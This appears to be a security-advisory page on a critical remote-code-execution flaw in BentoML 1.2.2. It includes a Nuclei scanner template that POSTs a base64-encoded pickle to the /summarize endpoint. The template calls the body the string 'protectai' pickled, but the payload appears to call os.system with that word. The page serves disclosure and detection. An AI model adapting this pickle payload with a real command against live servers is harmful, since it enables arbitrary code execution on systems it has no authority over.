Critical Severity
bentoml
Remote Code Execution via Insecure Deserialization in BentoML
BentoML version 1.2.2 is vulnerable to remote code execution (RCE) through insecure deserialization, allowing attackers to execute arbitrary code by sending a malicious POST request. This vulnerability was patched in version 1.2.5.
Available publicly on Apr 16 2024 | Available with Premium on Mar 25 2024
Nuclei Template
Nuclei Template
1id: bentoml-rce
2info:
3 name: BentoML Insecure Deserialization RCE Simulation
4 author: DanMcInerney, byt3bl33d3r, pinkdraconian
5 severity: critical
6 description: Simulates an insecure deserialization attack on BentoML to trigger remote code execution. Binary data is string "protectai" pickled.
7 reference:
8 - https://huntr.com/bounties/349a1cce-6bb5-4345-82a5-bf7041b65a68
9 classification:
10 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
11 cvss-score: 9.8
12 cwe-id: CWE-1188 # Insecure Default Initialization of Resource
13 tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning
14requests:
15 - method: POST
16 path:
17 - "{{BaseURL}}/summarize"
18 headers:
19 Content-Type: "application/vnd.bentoml+pickle"
20 body: !!binary |
21 gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4=
22 matchers-condition: and
23 matchers:
24 - type: word
25 words:
26 - "Input should be a valid dictionary or instance of Input"
27 part: bodyResources
Learn how to use the Nuclei scanners and other scripts, or download the scanners and use them yourself.
Want more out of Sightline?
Sightline offers even more for premium customers
Go Premium
We have 291 related security advisories that are available with Sightline Premium.
